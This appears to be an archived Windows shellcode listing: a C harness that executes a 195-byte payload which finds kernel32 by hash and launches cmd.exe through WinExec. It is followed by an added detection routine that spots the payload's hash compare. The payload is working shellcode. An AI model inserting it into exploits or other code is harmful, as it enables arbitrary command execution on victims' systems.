# Title : Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
# Published : 2010-06-25
# Author : RubberDuck
/*
Title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
Date: 2010-06-25
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
Thanks to: kernelhunter, Lodus, Vrtule and others
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
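int main(){
    /*
     * Position-independent 32-bit x86 stub:
     *  - reads the PEB through fs:[0x30] and walks the loader's module list,
     *  - hashes each module name (24 bytes, upper-cased, ror 13) until the
     *    result is 0x6A4ABC5B, i.e. kernel32.dll,
     *  - scans kernel32's export names for "GetProcAddress",
     *  - resolves and calls WinExec("cmd", 5), then ExitProcess.
     */
    unsigned char shellcode[]=
    "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
    "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
    "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
    "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
    "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
    "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
    "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
    "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
    "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
    "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
    "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
    "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
    "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
    "\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24"
    "\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51"
    "\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE"
    "\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45"
    "\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54"
    "\x24\x20\x57\xFF\xD0";
    /* The payload contains no zero bytes, so strlen() reports its full size. */
    printf("Size = %d\n", (int)strlen((const char *)shellcode));
    system("PAUSE");
    /* Jumps into the array, which lives on the stack: this call faults with
       an access violation when DEP/NX is enforced for the process. */
    ((void (*)())shellcode)();
    return 0;
}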
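
The opening bytes of the listing locate kernel32.dll by hashing each loaded module's name and comparing the result with the immediate in `81 FF 5B BC 4A 6A` (`cmp edi, 0x6A4ABC5B`). The C below is an added example, not part of the original listing or the author's code: it reproduces that hash and scans a buffer for such a compare, the kind of check a static triage tool or signature rule can build on. `WATCH` and `SAMPLE` are constructed for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Rotate-right-13 additive hash over the UTF-16LE bytes of an ASCII module
   name, folding bytes >= 'a' to upper case as the stub's loop does. The stub
   always hashes 24 bytes, which is exactly "kernel32.dll" in UTF-16LE. */
static uint32_t ror13_name_hash(const char *name)
{
    uint32_t h = 0;
    for (; *name; name++) {
        uint8_t b = (uint8_t)*name;
        if (b >= 0x61 && b < 0x80) b -= 0x20;   /* cmp al,61h / jl / sub al,20h */
        h = ((h >> 13) | (h << 19)) + b;        /* ror edi,0Dh / add edi,eax */
        h = (h >> 13) | (h << 19);              /* zero high byte of the unit */
    }
    return h;
}

/* Scan buf for "81 FF imm32" (cmp edi, imm32) whose immediate equals the hash
   of one of the given module names. Returns the index of the matching name
   and stores the offset of the instruction in *off, or returns -1. */
static int find_module_hash_cmp(const uint8_t *buf, size_t len,
                                const char *const *names, size_t n, size_t *off)
{
    for (size_t i = 0; i + 6 <= len; i++) {
        if (buf[i] != 0x81 || buf[i + 1] != 0xFF) continue;
        uint32_t imm = (uint32_t)buf[i + 2] | (uint32_t)buf[i + 3] << 8 |
                       (uint32_t)buf[i + 4] << 16 | (uint32_t)buf[i + 5] << 24;
        for (size_t k = 0; k < n; k++)
            if (ror13_name_hash(names[k]) == imm) { *off = i; return (int)k; }
    }
    return -1;
}

/* Hypothetical watch list and a constructed sample buffer: NOP padding around
   the six-byte compare taken from the listing. */
static const char *const WATCH[] = { "ntdll.dll", "kernel32.dll" };
static const uint8_t SAMPLE[] = { 0x90, 0x90, 0x81, 0xFF, 0x5B, 0xBC, 0x4A, 0x6A, 0x90 };

int main(void)
{
    size_t off = 0;
    int k = find_module_hash_cmp(SAMPLE, sizeof SAMPLE, WATCH, 2, &off);
    if (k >= 0) printf("cmp edi,hash(%s) at offset %zu\n", WATCH[k], off);
    else        printf("no module-hash compare found\n");
    return 0;
}
```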